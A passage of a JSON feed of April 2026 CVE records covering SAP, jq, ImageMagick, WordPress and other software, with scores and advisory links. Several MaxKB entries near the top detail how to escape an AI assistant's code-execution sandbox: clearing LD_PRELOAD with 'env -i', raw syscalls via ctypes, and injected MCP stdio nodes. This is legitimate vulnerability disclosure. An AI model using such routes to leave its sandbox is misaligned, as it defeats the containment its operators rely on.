2.8.0.","cvss":5.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.0,"cvss_v4":null,"epss":0.00027,"ranking_epss":0.07651,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/4d06362750b15390437f1d2e4d14ec79baef8559","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-w9g4-q3gm-6q6w"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39420","summary":"MaxKB is an open-source AI assistant for enterprise. 
In versions 2.7.1 and below, an incomplete sandbox protection mechanism allows an authenticated user with tool execution privileges to escape the LD_PRELOAD-based sandbox. Using the env command, the attacker can clear the environment variables and drop the sandbox.so hook, leading to unrestricted Remote Code Execution (RCE) and network access. MaxKB restricts untrusted Python code execution via the Tool Debug API by injecting sandbox.so through the LD_PRELOAD environment variable. This intercepts sensitive C library functions (like execve, socket, open) to restrict network and file access. However, a patch allowed the /usr/bin/env utility to be executed by the sandboxed user. When an attacker is permitted to create subprocesses, they can execute the env -i python command. The -i flag instructs env to completely clear all environment variables before running the target program. This effectively drops the LD_PRELOAD environment variable. The newly spawned Python process will therefore execute natively without any sandbox hooks, bypassing all network and file system restrictions. This issue has been fixed in version 2.8.0.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":0.00153,"ranking_epss":0.3598,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/2d17b08e6b060329803754a05e806d0ddecf3fa8","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-7wgv-v2r3-7f7w"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39421","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a sandbox escape vulnerability in the ToolExecutor component. 
By leveraging Python's ctypes library to execute raw system calls, an authenticated attacker with workspace privileges can bypass the LD_PRELOAD-based sandbox.so module to achieve arbitrary code execution via direct kernel system calls, enabling full network exfiltration and container compromise. The library intercepts critical standard system functions such as execve, system, connect, and open. It also intercepts mprotect to prevent PROT_EXEC (executable memory) allocations within the sandboxed Python processes, but pkey_mprotect is not blocked. This issue has been fixed in version 2.8.0.","cvss":6.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.3,"cvss_v4":null,"epss":0.00074,"ranking_epss":0.22304,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/479701a4d2e6059506bad0057a66bed91abb5aef","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-9c6w-j7w5-3gf7"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39422","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain a Stored Cross-Site Scripting (XSS) vulnerability through the application name or icon fields when creating an application. When a victim visits the public chat interface (/ui/chat/{access_token}), the ChatHeadersMiddleware retrieves the application data and directly inserts the unescaped application name and icon into the HTML response via string replacement. This allows an attacker to execute arbitrary JavaScript in the victim's browser context. 
This issue has been fixed in version 2.8.0.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00044,"ranking_epss":0.13361,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/026a2d623e2aa5efa67c4834651e79d5d7cab1da","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-wf7p-3jq5-q52w","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-wf7p-3jq5-q52w"],"published_time":"2026-04-14T01:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34256","summary":"Due to a missing authorization check in SAP ERP and SAP S/4HANA (Private Cloud and On-Premise), an authenticated attacker could execute a particular ABAP report to overwrite any existing eight-character executable ABAP report without authorization. If the overwritten report is subsequently executed, the intended functionality could become unavailable. Successful exploitation impacts availability, with a limited impact on integrity confined to the affected report, while confidentiality remains unaffected.","cvss":7.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.1,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10732,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3731908","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T01:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34257","summary":"Due to an Open Redirect vulnerability in SAP NetWeaver Application Server ABAP, an unauthenticated attacker could craft a malicious URL that, if accessed by a victim, redirects them to a page controlled by the attacker. 
This causes low impact on confidentiality and integrity of the application with no impact on availability.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10541,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3692004","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T01:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34261","summary":"Due to a missing authorization check in SAP Business Analytics and SAP Content Management, an authenticated user could make unauthorized calls to certain remote function modules, potentially accessing sensitive information beyond their intended permissions. This vulnerability affects confidentiality, with no impact on integrity and availability.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00023,"ranking_epss":0.06149,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3705094","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T01:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34069","summary":"nimiq/core-rs-albatross is a Rust implementation of the Nimiq Proof-of-Stake protocol based on the Albatross consensus algorithm. In versions 1.2.2 and below, an unauthenticated p2p peer can cause the RequestMacroChain message handler task to panic. Sending a RequestMacroChain message where the first locator hash on the victim’s main chain is a micro block hash (not a macro block hash) causes said panic. The RequestMacroChain::handle handler selects the locator based only on \"is on main chain\", then calls get_macro_blocks() and panics via .unwrap() when the selected hash is not a macro block (BlockchainError::BlockIsNotMacro). 
This issue has been fixed in version 1.3.0.","cvss":5.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.3,"cvss_v4":null,"epss":0.00039,"ranking_epss":0.11627,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/nimiq/core-rs-albatross/commit/ae6c1e92342e72f80fd12accbe66ee80dd6802ac","https://github.com/nimiq/core-rs-albatross/pull/3660","https://github.com/nimiq/core-rs-albatross/releases/tag/v1.3.0","https://github.com/nimiq/core-rs-albatross/security/advisories/GHSA-48m6-486p-9j8p"],"published_time":"2026-04-14T00:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39417","summary":"MaxKB is an open-source AI assistant for enterprise. Versions 2.7.1 and below contain an incomplete fix for CVE-2025-53928, where a Remote Code Execution vulnerability still exists in the MCP node of the workflow engine. MaxKB only restricts the referencing code path (loading MCP config from the database). The else branch, responsible for loading mcp_servers directly from user-supplied JSON remains completely unpatched. Since mcp_source is an optional field (required=False), an attacker can simply omit it or set it to any non-referencing value to bypass the fix. By calling the workflow creation API directly with a crafted JSON payload, an attacker can inject a complete MCP node configuration with stdio transport, arbitrary command, and args — achieving RCE when the workflow is triggered via chat. 
This issue has been fixed in version 2.8.0.","cvss":4.6,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.6,"cvss_v4":null,"epss":0.0006,"ranking_epss":0.18582,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/1Panel-dev/MaxKB/commit/50e96002ee5dca34c68d3d9333b64ea358c92304","https://github.com/1Panel-dev/MaxKB/releases/tag/v2.8.0","https://github.com/1Panel-dev/MaxKB/security/advisories/GHSA-pw52-326g-r5xj"],"published_time":"2026-04-14T00:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40164","summary":"jq is a command-line JSON processor. Before commit 0c7d133c3c7e37c00b6d46b658a02244fdd3c784, jq used MurmurHash3 with a hardcoded, publicly visible seed (0x432A9843) for all JSON object hash table operations, which allowed an attacker to precompute key collisions offline. By supplying a crafted JSON object (~100 KB) where all keys hashed to the same bucket, hash table lookups degraded from O(1) to O(n), turning any jq expression into an O(n²) operation and causing significant CPU exhaustion. This affected common jq use cases such as CI/CD pipelines, web services, and data processing scripts, and was far more practical to exploit than existing heap overflow issues since it required only a small payload. 
This issue has been patched in commit 0c7d133c3c7e37c00b6d46b658a02244fdd3c784.","cvss":7.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":7.5,"cvss_v4":null,"epss":0.00036,"ranking_epss":0.10632,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/0c7d133c3c7e37c00b6d46b658a02244fdd3c784","https://github.com/jqlang/jq/security/advisories/GHSA-wwj8-gxm6-jc29"],"published_time":"2026-04-14T00:16:07","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27677","summary":"Due to missing authorization checks in the SAP S/4HANA OData Service (Manage Reference Equipment), an attacker could update and delete child entities via OData services without proper authorization. This vulnerability has a high impact on integrity, while confidentiality and availability are not impacted.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07258,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3715097","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27678","summary":"Due to missing authorization checks in the SAP S/4HANA backend OData Service (Manage Reference Structures), an attacker could update and delete child entities via exposed OData services without proper authorization. 
This vulnerability has a high impact on integrity, while confidentiality and availability are not impacted.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07258,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3715177","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27679","summary":"Due to missing authorization checks in the SAP S/4HANA frontend OData Service (Manage Reference Structures), an attacker could update and delete child entities via exposed OData services without proper authorization. This vulnerability has a high impact on integrity, while confidentiality and availability are not impacted.","cvss":6.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.5,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07258,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3716767","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27681","summary":"Due to insufficient authorization checks in SAP Business Planning and Consolidation and SAP Business Warehouse, an authenticated user can execute crafted SQL statements to read, modify, and delete database data. 
This leads to a high impact on the confidentiality, integrity, and availability of the system.","cvss":9.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":9.9,"cvss_v4":null,"epss":0.00047,"ranking_epss":0.14458,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3719353","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27683","summary":"SAP BusinessObjects Business Intelligence application allows an authenticated attacker to inject malicious JavaScript payloads through crafted URLs. When a victim accesses the URL, the script executes in the user's browser, potentially exposing restricted information. This results in a low impact on confidentiality with no impact on integrity and availability.","cvss":4.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.1,"cvss_v4":null,"epss":0.00029,"ranking_epss":0.08061,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3698216","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33948","summary":"jq is a command-line JSON processor. Commits before 6374ae0bcdfe33a18eb0ae6db28493b1f34a0a5b contain a vulnerability where CLI input parsing allows validation bypass via embedded NUL bytes. When reading JSON from files or stdin, jq uses strlen() to determine buffer length instead of the actual byte count from fgets(), causing it to truncate input at the first NUL byte and parse only the preceding prefix. This enables an attacker to craft input with a benign JSON prefix before a NUL byte followed by malicious trailing data, where jq validates only the prefix as valid JSON while silently discarding the suffix. 
Workflows relying on jq to validate untrusted JSON before forwarding it to downstream consumers are susceptible to parser differential attacks, as those consumers may process the full input including the malicious trailing bytes. This issue has been patched by commit 6374ae0bcdfe33a18eb0ae6db28493b1f34a0a5b.","cvss":2.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":2.9,"epss":0.00097,"ranking_epss":0.26819,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/6374ae0bcdfe33a18eb0ae6db28493b1f34a0a5b","https://github.com/jqlang/jq/security/advisories/GHSA-32cx-cvvh-2wj9"],"published_time":"2026-04-14T00:16:06","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27672","summary":"The Material Master application does not enforce authorization checks for authenticated users when executing reports, resulting in the disclosure of sensitive information. This vulnerability has a low impact on confidentiality and does not affect integrity and availability of the system.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00025,"ranking_epss":0.06878,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3703276","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27673","summary":"Due to a missing authorization check, SAP S/4HANA (Private Cloud and On-Premise) allows an authenticated user to delete files on the operating system and gain unauthorized control over file operations which could lead to no impact on Confidentiality, Low impact on Integrity and Availability of the 
application.","cvss":4.9,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.9,"cvss_v4":null,"epss":0.00031,"ranking_epss":0.08847,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3703813","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27674","summary":"Due to a Code Injection vulnerability in SAP NetWeaver Application Server Java (Web Dynpro Java), an unauthenticated attacker could supply crafted input that is interpreted by the application and causes it to reference attacker-controlled content. If a victim accesses the affected functionality, that attacker-controlled content could be executed in the victim's browser, potentially resulting in session compromise. This could allow the attacker to execute arbitrary client-side code, impacting the confidentiality and integrity of the application, with no impact to availability.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00054,"ranking_epss":0.16788,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3719397","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27675","summary":"SAP Landscape Transformation contains a vulnerability in an RFC-exposed function module that could allow a high privileged adversary to inject arbitrary ABAP code and operating system commands. Due to this, some information could be modified, but the attacker does not have control over kind or degree. 
This leads to a low impact on integrity, while confidentiality and availability are not impacted.","cvss":2.0,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":2.0,"cvss_v4":null,"epss":0.00028,"ranking_epss":0.07801,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3723097","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-27676","summary":"Due to missing authorization checks in the SAP S/4HANA OData Service (Manage Technical Object Structures), an attacker could update and delete child entities via exposed OData services without proper authorization. This vulnerability results in a low impact on integrity, while confidentiality and availability are not impacted.","cvss":4.3,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.3,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07258,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3711682","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:05","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-24318","summary":"Due to an Insecure session management vulnerability in SAP Business Objects Business Intelligence Platform, an unauthenticated attacker could obtain valid session tokens and reuse them to gain unauthorized access to a victim's session. If the application continues to accept previously issued tokens after authentication, the attacker could assume the victim's authenticated context. 
This could allow the attacker to access or modify information within the victim's session scope, impacting confidentiality and integrity, while availability remains unaffected.","cvss":4.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":4.2,"cvss_v4":null,"epss":0.00034,"ranking_epss":0.09772,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3702191","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:04","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-0512","summary":"Due to a Cross-Site Scripting (XSS) vulnerability in the SAP Supplier Relationship Management (SICF Handler in SRM Catalog), an unauthenticated attacker could craft a malicious URL, that if accessed by a victim, results in execution of malicious content within the victim's browser. This could allow the attacker to access and modify information, impacting the confidentiality and integrity of the application, while availability remains unaffected.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00069,"ranking_epss":0.21194,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://me.sap.com/notes/3645228","https://url.sap/sapsecuritypatchday"],"published_time":"2026-04-14T00:16:03","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6203","summary":"The User Registration & Membership plugin for WordPress is vulnerable to Open Redirect in versions up to and including 5.1.4. This is due to insufficient validation of user-supplied URLs passed via the 'redirect_to_on_logout' GET parameter before redirecting users. The `redirect_to_on_logout` GET parameter is passed directly to WordPress's `wp_redirect()` function instead of the domain-restricted `wp_safe_redirect()`. 
While `esc_url_raw()` is applied to sanitize malformed URLs, it does not restrict the redirect destination to the local domain, allowing an attacker to craft a specially formed link that redirects users to potentially malicious external URLs after logout, which could be used to facilitate phishing attacks.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00026,"ranking_epss":0.07341,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://plugins.trac.wordpress.org/browser/user-registration/tags/5.1.4/includes/functions-ur-template.php#L39","https://plugins.trac.wordpress.org/browser/user-registration/trunk/includes/functions-ur-template.php#L39","https://www.wordfence.com/threat-intel/vulnerabilities/id/020bed37-9544-49b7-941d-3b7f509fdfdf?source=cve"],"published_time":"2026-04-13T23:16:28","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39956","summary":"jq is a command-line JSON processor. In commits after 69785bf77f86e2ea1b4a20ca86775916889e91c9, the _strindices builtin in jq's src/builtin.c passes its arguments directly to jv_string_indexes() without verifying they are strings, and jv_string_indexes() in src/jv.c relies solely on assert() checks that are stripped in release builds compiled with -DNDEBUG. This allows an attacker to crash jq trivially with input like _strindices(0), and by crafting a numeric value whose IEEE-754 bit pattern maps to a chosen pointer, achieve a controlled pointer dereference and limited memory read/probe primitive. Any deployment that evaluates untrusted jq filters against a release build is vulnerable. 
This issue has been patched in commit fdf8ef0f0810e3d365cdd5160de43db46f57ed03.","cvss":6.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.1,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01846,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/fdf8ef0f0810e3d365cdd5160de43db46f57ed03","https://github.com/jqlang/jq/security/advisories/GHSA-6gc3-3g9p-xx28","https://github.com/jqlang/jq/security/advisories/GHSA-6gc3-3g9p-xx28"],"published_time":"2026-04-13T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-39979","summary":"jq is a command-line JSON processor. In commits before 2f09060afab23fe9390cce7cb860b10416e1bf5f, the jv_parse_sized() API in libjq accepts a counted buffer with an explicit length parameter, but its error-handling path formats the input buffer using %s in jv_string_fmt(), which reads until a NUL terminator is found rather than respecting the caller-supplied length. This means that when malformed JSON is passed in a non-NUL-terminated buffer, the error construction logic performs an out-of-bounds read past the end of the buffer. The vulnerability is reachable by any libjq consumer calling jv_parse_sized() with untrusted input, and depending on memory layout, can result in memory disclosure or process termination. 
The issue has been patched in commit 2f09060afab23fe9390cce7cb860b10416e1bf5f.","cvss":6.9,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":6.9,"epss":0.00042,"ranking_epss":0.12712,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/2f09060afab23fe9390cce7cb860b10416e1bf5f","https://github.com/jqlang/jq/security/advisories/GHSA-2hhh-px8h-355p","https://github.com/jqlang/jq/security/advisories/GHSA-2hhh-px8h-355p"],"published_time":"2026-04-13T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-5086","summary":"Crypt::SecretBuffer versions before 0.019 for Perl are susceptible to timing attacks.\n\nFor example, if Crypt::SecretBuffer was used to store and compare plaintext passwords, then discrepancies in timing could be used to guess the secret password.","cvss":null,"cvss_version":null,"cvss_v2":null,"cvss_v3":null,"cvss_v4":null,"epss":0.00018,"ranking_epss":0.04749,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://metacpan.org/release/NERDVANA/Crypt-SecretBuffer-0.019/source/Changes","http://www.openwall.com/lists/oss-security/2026/04/13/12"],"published_time":"2026-04-13T23:16:27","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40312","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, an off by one error in the MSL decoder could result in a crash when a malicious MSL file is read. 
This issue has been fixed in version 7.1.2-19.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/2a06c7be3bba3326caf8b7a8d1fa2e0d4b88998d","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5xg3-585r-9jh5","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-4786","summary":"Mitigation of CVE-2026-4519 was incomplete. If the URL contained \"%action\", the mitigation could be bypassed for certain browser types, and the \"webbrowser.open()\" API could have commands injected into the underlying shell. See CVE-2026-4519 for details.","cvss":7.0,"cvss_version":4.0,"cvss_v2":null,"cvss_v3":null,"cvss_v4":7.0,"epss":0.0002,"ranking_epss":0.05328,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/python/cpython/commit/c5767a72838a8dda9d6dc5d3558075b055c56bca","https://github.com/python/cpython/commit/d22922c8a7958353689dc4763dd72da2dea03fff","https://github.com/python/cpython/commit/f4654824ae0850ac87227fb270f9057477946769","https://github.com/python/cpython/issues/148169","https://github.com/python/cpython/pull/148170","https://mail.python.org/archives/list/security-announce@python.org/thread/JQDUNJVB4AQNTJECSUKOBDU3XCJIPSE5/"],"published_time":"2026-04-13T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6220","summary":"A vulnerability was identified in HummerRisk up to 1.5.0. This vulnerability affects the function ServerService.addServer of the file ServerService.java of the component Video File Download URL Handler. Such manipulation of the argument streamIp leads to server-side request forgery. 
It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.","cvss":5.1,"cvss_version":4.0,"cvss_v2":5.8,"cvss_v3":4.7,"cvss_v4":5.1,"epss":0.00033,"ranking_epss":0.0941,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ccccccctiiiiiiii-lab/public_exp/issues/1","https://vuldb.com/submit/785855","https://vuldb.com/vuln/357141","https://vuldb.com/vuln/357141/cti"],"published_time":"2026-04-13T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-6224","summary":"A security flaw has been discovered in nocobase plugin-workflow-javascript up to 2.0.23. This issue affects the function createSafeConsole of the file packages/plugins/@nocobase/plugin-workflow-javascript/src/server/Vm.js. Performing a manipulation results in sandbox issue. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.","cvss":6.9,"cvss_version":4.0,"cvss_v2":7.5,"cvss_v3":7.3,"cvss_v4":6.9,"epss":0.00039,"ranking_epss":0.11624,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/Pai-777/ai-cve/blob/main/docs/cve-drafts/nocobase-workflow-javascript-sandbox-escape.en.md","https://vuldb.com/submit/785881","https://vuldb.com/vuln/357142","https://vuldb.com/vuln/357142/cti"],"published_time":"2026-04-13T22:16:30","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-33947","summary":"jq is a command-line JSON processor. In versions 1.8.1 and below, functions jv_setpath(), jv_getpath(), and delpaths_sorted() in jq's src/jv_aux.c use unbounded recursion whose depth is controlled by the length of a caller-supplied path array, with no depth limit enforced. 
An attacker can supply a JSON document containing a flat array of ~65,000 integers (~200 KB) that, when used as a path argument by a trusted jq filter, exhausts the C call stack and crashes the process with a segmentation fault (SIGSEGV). This bypass works because the existing MAX_PARSING_DEPTH (10,000) limit only protects the JSON parser, not runtime path operations where arrays can be programmatically constructed to arbitrary lengths. The impact is denial of service (unrecoverable crash) affecting any application or service that processes untrusted JSON input through jq's setpath, getpath, or delpaths builtins. This issue has been addressed in commit fb59f1491058d58bdc3e8dd28f1773d1ac690a1f.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00013,"ranking_epss":0.02068,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/jqlang/jq/commit/fb59f1491058d58bdc3e8dd28f1773d1ac690a1f","https://github.com/jqlang/jq/security/advisories/GHSA-xwrw-4f8h-rjvg","https://github.com/jqlang/jq/security/advisories/GHSA-xwrw-4f8h-rjvg"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-34238","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below both 7.1.2-19 and 6.9.13-44, an integer overflow in the despeckle operation causes a heap buffer overflow on 32-bit builds that will result in an out of bounds write. 
This issue has been fixed in versions 6.9.13-44 and 7.1.2-19.","cvss":5.1,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.1,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/bcd8519c70ecd9ebbc180920f2cf97b267d1f440","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-26qp-ffjh-2x4v","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40169","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, a crafted image could result in an out of bounds heap write when writing a yaml or json output, resulting in a crash. This issue has been fixed in version 7.1.2-19.","cvss":6.2,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":6.2,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01525,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/commit/f86452a8aea37bf2b4bd36127f836dcc5f138b38","https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-5592-p365-24xh","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40183","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. In versions below 7.1.2-19, the JXL encoder has a heap write overflow when a user specifies that the image should be encoded as 16 bit floats. 
This issue has been fixed in version 7.1.2-19.","cvss":5.5,"cvss_version":3.0,"cvss_v2":null,"cvss_v3":5.5,"cvss_v4":null,"epss":0.00012,"ranking_epss":0.01569,"kev":false,"propose_action":null,"ransomware_campaign":null,"references":["https://github.com/ImageMagick/ImageMagick/releases/tag/7.1.2-19","https://github.com/ImageMagick/ImageMagick/security/advisories/GHSA-jvgr-9ph5-m8v4","https://github.com/dlemstra/Magick.NET/releases/tag/14.12.0"],"published_time":"2026-04-13T22:16:29","vendor":null,"product":null,"version":null},{"cve_id":"CVE-2026-40310","summary":"ImageMagick is free and open-source software used for editing and manipulating digital images. Versions below both 7.1.2-19 and 6.9.13-44 contain a heap out-of-bounds write in the JP2 encoder when a user specifies an invalid sampling index. This issue has been fixed in versions 6.9.13-44 and 